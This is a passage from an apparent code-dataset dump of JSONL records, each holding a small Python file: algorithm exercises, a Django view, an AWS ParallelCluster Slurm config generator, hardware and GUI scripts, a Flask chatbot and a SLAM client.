\"\"\"\n output = []\n for i in range(len(input)):\n c = input[i]\n # Since there would always be like 2 - 3 * 3 one operator split each other\n # Enter bt while operator\n if c == '+' or c == '-' or c == '*':\n for a in self.diffWaysToCompute(input[:i]):\n for b in self.diffWaysToCompute(input[i+1:]):\n\n output.append(a + b if c == '+' else(a - b if c == '-' else a * b))\n if not output:\n output.append(int(input))\n return output\n\ns = Solution()\ns.diffWaysToCompute('2*3-4*5')","sub_path":"backtrack/241 different-ways-to-add-parentheses.py","file_name":"241 different-ways-to-add-parentheses.py","file_ext":"py","file_size_in_byte":762,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"423638401","text":"from django.views.generic.detail import SingleObjectMixin\n\nfrom database.models import Collection\nfrom database.models import CollectionDevice\n\nfrom irekua_utils.permissions.data_collections import (\n devices as devices_permissions)\nfrom irekua_utils.permissions.data_collections import (\n users as user_permissions)\nfrom irekua_utils.permissions import (\n licences as licence_permissions)\nfrom selia.views.list_views.base import SeliaListView\nfrom irekua_utils.filters.data_collections import collection_devices\n\n\nclass ListCollectionDevicesView(SeliaListView, SingleObjectMixin):\n template_name = 'selia/list/collection_devices.html'\n list_item_template = 'selia/components/list_items/collection_device.html'\n help_template = 'selia/components/help/collection_devices.html'\n filter_form_template = 'selia/components/filters/collection_device.html'\n\n filter_class = collection_devices.Filter\n search_fields = collection_devices.search_fields\n ordering_fields = collection_devices.ordering_fields\n\n def has_create_permission(self):\n user = self.request.user\n return devices_permissions.create(user, collection=self.object)\n\n def get_permissions(self):\n permissions = super().get_permissions()\n user = self.request.user\n permissions['list_collection_users'] = user_permissions.list(\n user, collection=self.object)\n permissions['list_collection_licences'] = licence_permissions.list(\n user, collection=self.object)\n return permissions\n\n def get(self, request, *args, **kwargs):\n self.object = self.get_object(queryset=Collection.objects.all())\n return super().get(request, *args, **kwargs)\n\n def get_initial_queryset(self):\n return CollectionDevice.objects.filter(collection=self.object)\n\n def get_context_data(self, *args, **kwargs):\n context = super().get_context_data(*args, **kwargs)\n context['collection'] = self.object\n return context\n","sub_path":"irekua/selia/views/list_views/collection_devices.py","file_name":"collection_devices.py","file_ext":"py","file_size_in_byte":1997,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"66887787","text":"# Python 2.7.15\n# 19/04/11\n# 문제3. 동명이인 찾기\n\ndef findSameName(lst):\n s = set()\n for i in range(len(lst)-1):\n tmp = lst[i+1:]\n if lst[i] in tmp:\n s.add(lst[i])\n return s\n#end findSameName\n","sub_path":"python/Q3.py","file_name":"Q3.py","file_ext":"py","file_size_in_byte":235,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"629455646","text":"# Copyright 2021 Amazon.com, Inc. or its affiliates. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\").\n# You may not use this file except in compliance with the License.\n# A copy of the License is located at\n#\n# http://aws.amazon.com/apache2.0/\n#\n# or in the \"LICENSE.txt\" file accompanying this file.\n# This file is distributed on an \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, express or implied.\n# See the License for the specific language governing permissions and limitations under the License.\nimport argparse\nimport json\nimport logging\nimport re\nfrom os import makedirs, path\nfrom socket import gethostname\n\nimport requests\nimport yaml\nfrom jinja2 import Environment, FileSystemLoader\n\nlog = logging.getLogger()\ninstance_types_data = {}\n\n\nclass CriticalError(Exception):\n \"\"\"Critical error for the daemon.\"\"\"\n\n pass\n\n\ndef generate_slurm_config_files(\n output_directory, template_directory, input_file, instance_types_data_path, dryrun, no_gpu\n):\n \"\"\"\n Generate Slurm configuration files.\n\n For each queue, generate slurm_parallelcluster_{QueueName}_partitions.conf\n and slurm_parallelcluster_{QueueName}_gres.conf, which contain node info.\n\n Generate slurm_parallelcluster.conf and slurm_parallelcluster_gres.conf,\n which includes queue specifc configuration files.\n\n slurm_parallelcluster.conf is included in main slurm.conf\n and slurm_parallelcluster_gres.conf is included in gres.conf.\n \"\"\"\n # Make output directories\n output_directory = path.abspath(output_directory)\n pcluster_subdirectory = path.join(output_directory, \"pcluster\")\n makedirs(pcluster_subdirectory, exist_ok=True)\n env = _get_jinja_env(template_directory)\n\n cluster_config = _load_cluster_config(input_file)\n head_node_config = _get_head_node_config()\n queues = cluster_config[\"Scheduling\"][\"SlurmQueues\"]\n\n global instance_types_data\n with open(instance_types_data_path) as input_file:\n instance_types_data = json.load(input_file)\n\n # Generate slurm_parallelcluster_{QueueName}_partitions.conf and slurm_parallelcluster_{QueueName}_gres.conf\n is_default_queue = True # The first queue in the queues list is the default queue\n for queue in queues:\n for file_type in [\"partition\", \"gres\"]:\n _generate_queue_config(\n queue[\"Name\"], queue, is_default_queue, file_type, env, pcluster_subdirectory, dryrun, no_gpu=no_gpu\n )\n is_default_queue = False\n\n # Generate slurm_parallelcluster.conf and slurm_parallelcluster_gres.conf\n for template_name in [\"slurm_parallelcluster.conf\", \"slurm_parallelcluster_gres.conf\"]:\n _generate_slurm_parallelcluster_configs(\n queues,\n head_node_config,\n cluster_config[\"Scheduling\"][\"SlurmSettings\"],\n template_name,\n env,\n output_directory,\n dryrun,\n )\n\n generate_instance_type_mapping_file(pcluster_subdirectory, queues)\n\n log.info(\"Finished.\")\n\n\ndef _load_cluster_config(input_file_path):\n \"\"\"\n Load queues_info and add information used to render templates.\n\n :return: queues_info containing id for first queue, head_node_hostname and queue_name\n \"\"\"\n with open(input_file_path) as input_file:\n return yaml.load(input_file, Loader=yaml.SafeLoader)\n\n\ndef _get_head_node_config():\n return {\n \"head_node_hostname\": gethostname(),\n \"head_node_ip\": _get_head_node_private_ip(),\n }\n\n\ndef _get_head_node_private_ip():\n \"\"\"Get head node private ip from EC2 metadata.\"\"\"\n return _get_metadata(\"local-ipv4\")\n\n\ndef _generate_queue_config(\n queue_name, queue_config, is_default_queue, file_type, jinja_env, output_dir, dryrun, no_gpu=False\n):\n log.info(\"Generating slurm_parallelcluster_%s_%s.conf\", queue_name, file_type)\n rendered_template = jinja_env.get_template(f\"slurm_parallelcluster_queue_{file_type}.conf\").render(\n queue_name=queue_name, queue_config=queue_config, is_default_queue=is_default_queue, no_gpu=no_gpu\n )\n if not dryrun:\n filename = path.join(output_dir, f\"slurm_parallelcluster_{queue_name}_{file_type}.conf\")\n if file_type == \"gres\" and no_gpu:\n _write_rendered_template_to_file(\n \"# This file is automatically generated by pcluster\\n\"\n \"# Skipping GPUs configuration because Nvidia driver is not installed\",\n filename,\n )\n else:\n _write_rendered_template_to_file(rendered_template, filename)\n\n\ndef _generate_slurm_parallelcluster_configs(\n queues, head_node_config, scaling_config, template_name, jinja_env, output_dir, dryrun\n):\n log.info(\"Generating %s\", template_name)\n rendered_template = jinja_env.get_template(f\"{template_name}\").render(\n queues=queues,\n head_node_config=head_node_config,\n scaling_config=scaling_config,\n output_dir=output_dir,\n )\n if not dryrun:\n filename = f\"{output_dir}/{template_name}\"\n _write_rendered_template_to_file(rendered_template, filename)\n\n\ndef _get_jinja_env(template_directory):\n \"\"\"Return jinja environment with trim_blocks/lstrip_blocks set to True.\"\"\"\n file_loader = FileSystemLoader(template_directory)\n # A nosec comment is appended to the following line in order to disable the B701 check.\n # The contents of the default templates are known and the input configuration data is\n # validated by the CLI.\n env = Environment(loader=file_loader, trim_blocks=True, lstrip_blocks=True) # nosec nosemgrep\n env.filters[\"sanify_name\"] = lambda value: re.sub(r\"[^A-Za-z0-9]\", \"\", value)\n env.filters[\"gpus\"] = _gpu_count\n env.filters[\"gpu_type\"] = _gpu_type\n env.filters[\"vcpus\"] = _vcpus\n\n return env\n\n\ndef _gpu_count(instance_type):\n \"\"\"Return the number of GPUs for the instance.\"\"\"\n gpu_info = instance_types_data[instance_type].get(\"GpuInfo\", None)\n\n gpu_count = 0\n if gpu_info:\n for gpus in gpu_info.get(\"Gpus\", []):\n gpu_manufacturer = gpus.get(\"Manufacturer\", \"\")\n if gpu_manufacturer.upper() == \"NVIDIA\":\n gpu_count += gpus.get(\"Count\", 0)\n else:\n log.info(\n f\"ParallelCluster currently does not offer native support for '{gpu_manufacturer}' GPUs. \"\n \"Please make sure to use a custom AMI with the appropriate drivers in order to leverage \"\n \"GPUs functionalities\"\n )\n\n return gpu_count\n\n\ndef _gpu_type(instance_type):\n \"\"\"Return name or type of the GPU for the instance.\"\"\"\n gpu_info = instance_types_data[instance_type].get(\"GpuInfo\", None)\n # Remove space and change to all lowercase for name\n return \"no_gpu_type\" if not gpu_info else gpu_info.get(\"Gpus\")[0].get(\"Name\").replace(\" \", \"\").lower()\n\n\ndef _vcpus(compute_resource) -> int:\n \"\"\"Get the number of vcpus for the instance according to disable_hyperthreading and instance features.\"\"\"\n instance_type = compute_resource[\"InstanceType\"]\n disable_simultaneous_multithreading = compute_resource[\"DisableSimultaneousMultithreading\"]\n instance_type_info = instance_types_data[instance_type]\n vcpus_info = instance_type_info.get(\"VCpuInfo\", {})\n vcpus_count = vcpus_info.get(\"DefaultVCpus\")\n threads_per_core = vcpus_info.get(\"DefaultThreadsPerCore\")\n if threads_per_core is None:\n supported_architectures = instance_type_info.get(\"ProcessorInfo\", {}).get(\"SupportedArchitectures\", [])\n threads_per_core = 2 if \"x86_64\" in supported_architectures else 1\n return vcpus_count if not disable_simultaneous_multithreading else (vcpus_count // threads_per_core)\n\n\ndef _write_rendered_template_to_file(rendered_template, filename):\n log.info(\"Writing contents of %s\", filename)\n with open(filename, \"w\") as output_file:\n output_file.write(rendered_template)\n\n\ndef _setup_logger():\n logging.basicConfig(\n level=logging.INFO, format=\"%(asctime)s - [%(name)s:%(funcName)s] - %(levelname)s - %(message)s\"\n )\n\n\ndef generate_instance_type_mapping_file(output_dir, queues):\n \"\"\"Generate a mapping file to retrieve the Instance Type related to the instance key used in the slurm nodename.\"\"\"\n instance_name_type_mapping = {}\n for queue in queues:\n instance_name_type_mapping[queue[\"Name\"]] = {}\n compute_resources = queue[\"ComputeResources\"]\n hostname_regex = re.compile(\"[^A-Za-z0-9]\")\n for compute_resource in compute_resources:\n instance_type = compute_resource.get(\"InstanceType\")\n # Remove all characters excepts letters and numbers\n sanitized_compute_name = re.sub(hostname_regex, \"\", compute_resource.get(\"Name\"))\n instance_name_type_mapping[queue[\"Name\"]][sanitized_compute_name] = instance_type\n\n filename = f\"{output_dir}/instance_name_type_mappings.json\"\n log.info(\"Generating %s\", filename)\n with open(filename, \"w\") as output_file:\n output_file.write(json.dumps(instance_name_type_mapping, indent=4))\n\n\ndef _get_metadata(metadata_path):\n \"\"\"\n Get EC2 instance metadata.\n\n :param metadata_path: the metadata relative path\n :return the metadata value.\n \"\"\"\n try:\n token = requests.put(\n \"http://169.254.169.254/latest/api/token\", headers={\"X-aws-ec2-metadata-token-ttl-seconds\": \"300\"}\n )\n headers = {}\n if token.status_code == requests.codes.ok:\n headers[\"X-aws-ec2-metadata-token\"] = token.content\n metadata_url = \"http://169.254.169.254/latest/meta-data/{0}\".format(metadata_path)\n metadata_value = requests.get(metadata_url, headers=headers).text\n except Exception as e:\n error_msg = \"Unable to get {0} metadata. Failed with exception: {1}\".format(metadata_path, e)\n log.critical(error_msg)\n raise CriticalError(error_msg)\n\n log.debug(\"%s=%s\", metadata_path, metadata_value)\n return metadata_value\n\n\ndef main():\n try:\n _setup_logger()\n log.info(\"Running ParallelCluster Slurm Config Generator\")\n parser = argparse.ArgumentParser(description=\"Take in slurm configuration generator related parameters\")\n parser.add_argument(\n \"--output-directory\", type=str, help=\"The output directory for generated slurm configs\", required=True\n )\n parser.add_argument(\n \"--template-directory\", type=str, help=\"The directory storing slurm config templates\", required=True\n )\n parser.add_argument(\n \"--input-file\",\n type=str,\n # Todo: is the default necessary?\n default=\"/opt/parallelcluster/slurm_config.json\",\n help=\"Yaml file containing pcluster configuration file\",\n )\n parser.add_argument(\n \"--instance-types-data\",\n type=str,\n help=\"JSON file containing info about instance types\",\n )\n parser.add_argument(\n \"--dryrun\",\n action=\"store_true\",\n help=\"dryrun\",\n required=False,\n default=False,\n )\n parser.add_argument(\n \"--no-gpu\",\n action=\"store_true\",\n help=\"no gpu configuration\",\n required=False,\n default=False,\n )\n args = parser.parse_args()\n generate_slurm_config_files(\n args.output_directory,\n args.template_directory,\n args.input_file,\n args.instance_types_data,\n args.dryrun,\n args.no_gpu,\n )\n except Exception as e:\n log.exception(\"Failed to generate slurm configurations, exception: %s\", e)\n raise\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"cookbooks/aws-parallelcluster-config/files/default/head_node_slurm/slurm/pcluster_slurm_config_generator.py","file_name":"pcluster_slurm_config_generator.py","file_ext":"py","file_size_in_byte":11785,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"620828911","text":"import sys\nimport time\nimport atexit\nfrom Phidget22.Devices.DistanceSensor import *\nfrom Phidget22.PhidgetException import *\nfrom Phidget22.Phidget import *\nfrom Phidget22.Net import *\nfrom Adafruit_MotorHAT import Adafruit_MotorHAT, Adafruit_DCMotor\n\n\nDISTANCE = 0.\n\n\ntry:\n ch = DistanceSensor()\nexcept RuntimeError as e:\n print(\"Runtime Exception %s\" % e.details)\n print(\"Press Enter to Exit...\\n\")\n readin = sys.stdin.read(1)\n exit(1)\n\n\ndef DistanceSensorAttached(self):\n try:\n attached = self\n except PhidgetException as e:\n print(\"Phidget Exception %i: %s\" % (e.code, e.details))\n print(\"Press Enter to Exit...\\n\")\n readin = sys.stdin.read(1)\n exit(1)\n\n\ndef DistanceSensorDetached(self):\n detached = self\n try:\n print(\"\\nDetach event on Port %d Channel %d\" %\n (detached.getHubPort(), detached.getChannel()))\n except PhidgetException as e:\n print(\"Phidget Exception %i: %s\" % (e.code, e.details))\n print(\"Press Enter to Exit...\\n\")\n readin = sys.stdin.read(1)\n exit(1)\n\n\ndef ErrorEvent(self, eCode, description):\n print(\"Error %i : %s\" % (eCode, description))\n\n\ndef DistanceChangeHandler(self, distance):\n DISTANCE = distance\n print(DISTANCE)\n\n\ndef initSensor():\n try:\n ch.setOnAttachHandler(DistanceSensorAttached)\n ch.setOnDetachHandler(DistanceSensorDetached)\n ch.setOnErrorHandler(ErrorEvent)\n ch.setOnDistanceChangeHandler(DistanceChangeHandler)\n\n print(\"Waiting for the Phidget DistanceSensor Object to be attached...\")\n ch.openWaitForAttachment(5000)\n except PhidgetException as e:\n print(\"Phidget Exception %i: %s\" % (e.code, e.details))\n print(\"Press Enter to Exit...\\n\")\n readin = sys.stdin.read(1)\n exit(1)\n return ch\n\n\ndef getDistance():\n return DISTANCE\n\n\ndef sensorClose():\n try:\n ch.close()\n except PhidgetException as e:\n print(\"Phidget Exception %i: %s\" % (e.code, e.details))\n print(\"Press Enter to Exit...\\n\")\n readin = sys.stdin.read(1)\n exit(1)\n print(\"Closed DistanceSensor device\")\n exit(0)\n\n# 무조건 같은 폴더안에 phidget22 ~ 있어야함!\n\n","sub_path":"라즈베리파이/Tracking/sensor.py","file_name":"sensor.py","file_ext":"py","file_size_in_byte":2229,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"591997222","text":"#-*- coding: utf-8 -*-\n\"\"\"\nhttps://yahoo-procon2019-qual.contest.atcoder.jp/tasks/yahoo_procon2019_qual_a\n\"\"\"\n\nfrom collections import defaultdict\ndp = defaultdict(int)\ndef rec(l, k, bis, y, a, b):\n print(l, k, bis, y, a, b)\n if (l, bis, y) in dp:\n print(\"hit, dp size %s\" % len(dp))\n return dp[(l, bis, y)]\n if l == k+1:\n dp[(l, bis, y)] = bis\n return bis\n else:\n\n if y > 0: ret = rec(l+1, k, bis+b, y-1, a, b)\n elif bis >= a: ret = rec(l+1, k, bis-a, y+1, a, b)\n else: ret = rec(l+1, k, bis+1, y, a, b)\n dp[(l, bis, y)] = ret\n return dp[(l, bis, y)]\n\ndef sol_botsu(k, a, b):\n # global dp\n # dp = defaultdict(int)\n # return rec(1, k, 1, 0, a, b)\n bis = 1\n y = 0\n for i in range(k):\n if y > 0: bis+=b; y-=1\n elif bis >= a: bis-=a; y+=1\n else: bis+=1\n return bis\n\ndef sol_botsu2(k, a, b):\n bis = 1\n y = 0\n i = 0\n while k > 0:\n print(k, bis, y)\n rest = a - (bis % a)\n if k - (rest) >= 2:\n print(\"saving\")\n k-=(rest); y+=1; bis-=(bis % a); k-=1;\n elif y > 0:\n print(\"payoff\")\n k -= 1; bis = (y*b); y = 0;\n else:\n print(\"normal\")\n if k > a:\n k-=a; bis += a\n else:\n bis += k; k = 0\n i+=1\n #if i == 20: break\n return bis\n\n\ndef sol_botsu3(k, a, b): # なぜに!?\n print(k, a, b)\n bis = 1\n bank = 0\n y = 0\n i = 1\n while k > 0:\n print(\"status:i:%s, k:%s, bis:%s y:%s, bank:%s\" % (i, k, bis, y, bank))\n need = a - (bis % a)\n if k - (need) >= 2:\n print(\"saving\")\n k-=(need); bis+=need\n elif k -1 >=1 and bis >= a:\n print(\"buying yen\")\n x = (bis/a)\n k-=1; y+=x; bis-=(a*x);\n elif y > 0:\n print(\"pay off\")\n k-=1; bank += y*b; y = 0\n else:\n #print(\"unexpected\")\n print(\"finishing\")\n bis += k; k=0;\n #k-=1; bis+=1;\n i+=1\n return bank + bis\n\n\ndef sol_botsu4(k, a, b):\n print(k, a, b)\n bis = 1\n bank = 0\n y = 0\n i = 1\n while k > 0:\n print(\"status:i:%s, k:%s, bis:%s y:%s, bank:%s\" % (i, k, bis, y, bank))\n need = a - (bis % a)\n if y == 1:\n #print(\"Y -> bis\")\n k-=1; bank += y*b; y = 0\n elif y == 1:\n #print(\"Y -> bis(unexpected)\")\n k-=1; bank += y*b; y = 0\n elif k -1 >=1 and bis >= a:\n x = (bis/a)\n #print(\"bis -> Y(buying %s Y by bis:%s\" % (x, bis))\n k-=1; y+=x; bis-=(a*x);\n elif k - (need) >= 2:\n #print(\"progress %s to increase bis\" % need)\n k-=(need); bis+=need\n else:\n #print(\"kotsukotsu\")\n k-=1; bis+=1\n\n\n\n i+=1\n return bank + bis\n\n\n\ndef sol(k, a, b):\n bis = 1\n if 1+k < a:\n return k+1\n else:\n bis += int((k-1)/2) * (b-a)\n if k % 2 == 1:\n bis += 1\n return bis\n\n\n\nimport sys\nsys.setrecursionlimit(314159265)\ntest = False\ntest = True\nif test:\n # n, k = 5, 5\n S =list( map(int, \"4 2 6\".split()))\n k, a, b = S\n print(sol(k, a, b))\n\n S =list( map(int, \"7 3 4\".split()))\n k, a, b = S\n print(sol(k, a, b))\n\n S =list( map(int, \"314159265 35897932 384626433\".split()))\n # 48518828981938099\n k, a, b = S\n print(sol(k, a, b))\n\n\nelse:\n #n, k = map(int, input().split())\n S =list( map(int, input().split()))\n k, a, b = S\n print(sol(k, a, b))\n\n\n","sub_path":"atc/abc_118_c_xxx.py","file_name":"abc_118_c_xxx.py","file_ext":"py","file_size_in_byte":3596,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"365609885","text":"class TreeNode(object):\n\n def __init__(self, start, end):\n self.val = 0\n self.start = start\n self.end = end\n self.left = None\n self.right = None\n\n\nclass SegementTree(object):\n\n def buildSegementTree(self, nums, left, right):\n if left == right:\n node = TreeNode(left, right)\n node.val = nums[left]\n return node\n else:\n mid = (left + right) // 2\n node = TreeNode(left, right)\n node.left = self.buildSegementTree(nums, left, mid)\n node.right = self.buildSegementTree(nums, mid + 1, right)\n node.val = node.left.val + node.right.val\n\n return node\n\n def __init__(self, nums):\n if nums:\n self.treeRoot = self.buildSegementTree(nums, 0, len(nums) - 1)\n else:\n self.treeRoot = None\n\n def findRangeSum(self, root, begin, end):\n if not root or root.start > begin or root.end < end:\n return 0\n\n if root.start == begin and root.end == end:\n return root.val\n\n mid = (root.start + root.end) // 2\n if end <= mid:\n return self.findRangeSum(root.left, begin, end)\n if begin > mid:\n return self.findRangeSum(root.right, begin, end)\n\n return self.findRangeSum(root.left, begin, mid) + self.findRangeSum(root.right, mid + 1, end)\n","sub_path":"CCI/2/segmentTree.py","file_name":"segmentTree.py","file_ext":"py","file_size_in_byte":1392,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"393330575","text":"#type: ignore\n\"\"\"Test preprocess.py.\"\"\"\nfrom .preprocess import concatenate\n\ndef test_concatenate_when_dest_exists(files_abc, tmp_path):\n \"\"\"There must be an HTML comment between each file section in the\n destination file.\n\n Assume destination file exists.\n \"\"\"\n dest, *sources = files_abc\n sources[0].write_text(\"B\")\n sources[1].write_text(\"C\")\n\n concatenate(dest, *sources, basedir=tmp_path)\n content = dest.read_text()\n template = \"\"\"\"\"\"\n\n assert template.format(str(sources[0].relative_to(tmp_path))) in content\n assert template.format(str(sources[1].relative_to(tmp_path))) in content\n\ndef test_concatenate_when_dest_does_not_exist(tmp_path):\n \"\"\"preprocess.concatenate must work even if the destination file\n does not exist.\n \"\"\"\n dest = tmp_path/\"dest.md\"\n source_a = tmp_path/\"a.md\"\n source_b = tmp_path/\"b.md\"\n source_a.write_text(\"A\")\n source_b.write_text(\"B\")\n assert not dest.exists()\n\n concatenate(dest, source_a, source_b, basedir=tmp_path)\n content = dest.read_text()\n template = \"\"\"\"\"\"\n\n assert template.format(str(source_a.relative_to(tmp_path))) in content\n assert template.format(str(source_b.relative_to(tmp_path))) in content\n\ndef test_concatenate_when_there_are_no_sources(tmp_path):\n \"\"\"preprocess.concatenate must create an empty file.\"\"\"\n dest = tmp_path/\"dest.md\"\n dest.write_text(\"Delete this.\")\n concatenate(dest, basedir=tmp_path)\n\n content = dest.read_text()\n assert not content\n","sub_path":"cli/slipbox/test_preprocess.py","file_name":"test_preprocess.py","file_ext":"py","file_size_in_byte":1581,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"71305359","text":"from DragBox import DragBox\nfrom DropArea import DropArea\nfrom gi.repository import Gtk\nfrom gi.repository import Gdk\n\n\nclass TestWindow(Gtk.Window):\n def __init__(self):\n super(TestWindow, self).__init__(title=\"TestWindow\")\n self.drop_area = DropArea()\n self.drop_area.set_size(450, 450)\n self.drop_area.set_size_request(450, 450)\n self.drop_area.override_background_color(Gtk.StateType.NORMAL, Gdk.RGBA(0, 0.3, 0.5, 1))\n\n self.fixed = Gtk.Fixed()\n self.fixed.put(self.drop_area, 100, 100)\n self.add(self.fixed)\n\n drag_box = DragBox()\n drag_box.set_size_request(200, 200)\n drag_box.override_background_color(Gtk.StateType.NORMAL, Gdk.RGBA(1, 0, 0.5))\n self.drop_area.add_drag_box(drag_box, 100, 20)\n\ntest_window = TestWindow()\ntest_window.set_size_request(640, 640)\ntest_window.connect('delete-event', Gtk.main_quit)\ntest_window.show_all()\nGtk.main()","sub_path":"test/testDropArea.py","file_name":"testDropArea.py","file_ext":"py","file_size_in_byte":938,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"293507288","text":"import serial\nimport time\n\nser = serial.Serial('COM13', 9600, timeout=0)\n\nprint(\"1=on or 2=off\")\nwhile 1:\n\n var = str.encode(input())\n ser.write(var)\n time.sleep(0.1)\n print(ser.readline().decode(\"utf-8\"))","sub_path":"python/bluetooth-testing/basic-tests.py","file_name":"basic-tests.py","file_ext":"py","file_size_in_byte":217,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"364665199","text":"\n#import necessary libraries\nfrom flask import Flask, render_template, request\nfrom datetime import datetime\n#from chatterbot import ChatBot\n#from chatterbot.trainers import ListTrainer\nimport os\nimport io\nimport random\nimport string # to process standard python strings\nimport warnings\nimport numpy as np\nfrom sklearn.feature_extraction.text import TfidfVectorizer\nfrom sklearn.metrics.pairwise import cosine_similarity\nimport warnings\nwarnings.filterwarnings('ignore')\nimport nltk\nfrom nltk.stem import WordNetLemmatizer\nnltk.download('popular', quiet=True) # for downloading packages\n\n# uncomment the following only the first time\n# nltk.download('punkt')\n# nltk.download('wordnet')\n\n#Reading in the corpus\nwith open('chatbot.txt','r', encoding='utf8', errors ='ignore') as fin:\n raw = fin.read()\n#TOkenisation\nsent_tokens = nltk.sent_tokenize(raw)# converts to list of sentences \nword_tokens = nltk.word_tokenize(raw)# converts to list of words\n\n# Preprocessing\nlemmer = WordNetLemmatizer()\ndef LemTokens(tokens):\n return [lemmer.lemmatize(token) for token in tokens]\nremove_punct_dict = dict((ord(punct), None) for punct in string.punctuation)\ndef LemNormalize(text):\n return LemTokens(nltk.word_tokenize(text.lower().translate(remove_punct_dict)))\n\n\n# Keyword Matching\nGREETING_INPUTS = [\"hello\", \"hi\", \"greetings\", \"sup\", \"whats up\", \"hey\", \"heyy\", \"heyyy\", \"hello there\", \"how are you\", \"how r u\", \"namaste\", \"good morning\", \"good afternoon\", \"good evening\", \"yo\", \"kaisanba\"]\nGREETING_RESPONSES = [\"hi\", \"hey\", \"hi there\", \"hello\", \"I am glad! You are talking to me\", \"It's nice to meet you.\", \"It's a pleasure to meet you.\", \"It's great seeing you. I hope you're doing well.\"]\n\ndef greeting(sentence):\n \"\"\"If user's input is a greeting, return a greeting response\"\"\"\n # for word in sentence:\n if sentence.lower() in GREETING_INPUTS:\n return random.choice(GREETING_RESPONSES)\n else:\n return None\n\n\n# Generating response\ndef response(user_response):\n robo_response=''\n sent_tokens.append(user_response)\n TfidfVec = TfidfVectorizer(tokenizer=LemNormalize, stop_words='english')\n tfidf = TfidfVec.fit_transform(sent_tokens)\n vals = cosine_similarity(tfidf[-1], tfidf)\n idx=vals.argsort()[0][-2]\n flat = vals.flatten()\n flat.sort()\n req_tfidf = flat[-2]\n if(req_tfidf==0):\n robo_response=robo_response+\"I am sorry! I did not understand this.\"\n return robo_response\n else:\n robo_response = robo_response+sent_tokens[idx]\n return robo_response\n\n\n\n \n#GUI starts\napp = Flask(__name__)\n\n@app.route('/home')\ndef index():\n return render_template('index.html')\n\n@app.route('/home', methods=['POST'])\ndef feedback():\n experience=request.form['experience']\n comments = request.form['Comments']\n name = request.form['name1']\n email = request.form['email']\n\n #storing the feedback with timestamp\n dateTimeObj = datetime.now()\n\n timestampStr = dateTimeObj.strftime(\"%d-%b-%Y (%H:%M:%S.%f)\")\n\n f = open(\"feedback.txt\", \"a\")\n if(experience=='good'):\n \tflag ='1'\n elif(experience=='average'):\n \tflag='2'\n else:\n \tflag='3'\n f.write(timestampStr +\",\"+ \"experience: \" + experience +\",\" + flag +\",\" + \"Comments: \" + comments +\",\" + \"name: \" + name +\",\" + \"email: \" + email +\"\\n\")\n f.close()\n return render_template('index.html')\n\n\n\n\n\n\n\n@app.route('/process',methods=['POST'])\ndef process():\n leave = ['bye', 'good bye', 'see ya', 'see you later', 'take care', 'cheerio']\n user_input=request.form['user_input']\n user_response=user_input.lower()\n if(user_response not in leave):\n if(user_response=='thanks' or user_response=='thank you'):\n # flag=False\n bot_response = \"You are welcome...\"\n # print(bot_response)\n else:\n if(greeting(user_response)!= None):\n bot_response = greeting(user_response)\n # print(bot_response)\n else:\n bot_response = response(user_response)\n #print(bot_response)\n sent_tokens.remove(user_response)\n else:\n bot_response = random.choice(leave)\n # print(bot_response)\n\n # bot_response=response(user_response)\n bot_response=str(bot_response)\n # print(bot_response)\n # print(\"USER: \" + user_response)\n # print(\"SFIT: \"+bot_response)\n\n #storing the chats with timestamp\n dateTimeObj = datetime.now()\n timestampStr = dateTimeObj.strftime(\"%d-%b-%Y (%H:%M:%S.%f)\")\n\n f = open(\"chats_storage.txt\", \"a\")\n \n if(bot_response=='I am sorry! I did not understand this.'):\n \tflag1='0'\n else:\n \tflag1='1'\n \n f.write(timestampStr +\",\"+ \"USER: \" + user_response +\",\"+ \"SFIT: \"+ bot_response +\",\"+ flag1 +\"\\n\")\n\n # timestampStr = dateTimeObj.strftime(\"%d-%b-%Y (%H:%M:%S.%f)\")\n #print(t_count)\n \n f.close()\n\n\n # bot_response = \"flask try karra hu hojaa fatafat...\"\n return render_template('index.html', user_input=user_response, bot_response=bot_response)\n\nif __name__=='__main__':\n app.run(debug=True, port = 5001)\n\n\n","sub_path":"chatbot.py","file_name":"chatbot.py","file_ext":"py","file_size_in_byte":5110,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"12320514","text":"from car_controller.SlamDataModel import SlamDataModel\nimport car_controller.slam_proto_pb2 as slam_pb\nimport zmq\nimport threading\nimport time\n\nclass RemoteSlamController():\n def __init__(self,\n slam_data_model: SlamDataModel,\n slam_Server_address):\n self.slam_Server_address = slam_Server_address\n self.active = True\n self.slam_map_pb = slam_pb.SlamMap()\n self.slam_data_model = slam_data_model\n context = zmq.Context()\n self.map_socket_init(context)\n threading.Thread(target = self.receive_slam_thread, daemon=True).start()\n\n def map_socket_init(self, context):\n self.map_socket = context.socket(zmq.SUB)\n self.map_socket.connect(\"tcp://\" + self.slam_Server_address + \":5555\")\n self.map_socket.setsockopt(zmq.SUBSCRIBE, b'')\n self.map_socket.setsockopt(zmq.RCVHWM, 2)\n self.map_socket.setsockopt(zmq.RCVBUF, 1024)\n\n def receive_slam_thread(self):\n while True:\n if self.active:\n data = self.map_socket.recv()\n self.slam_map_pb.ParseFromString(data)\n\n self.slam_data_model.set_position(self.slam_map_pb.x,\n self.slam_map_pb.y,\n self.slam_map_pb.theta)\n\n self.slam_data_model.set_map(bytearray(self.slam_map_pb.grid))\n self.slam_data_model.set_map_dimentions(self.slam_map_pb.width, self.slam_map_pb.height)\n else:\n time.sleep(1)\n\n def set_active(self, state):\n self.active = 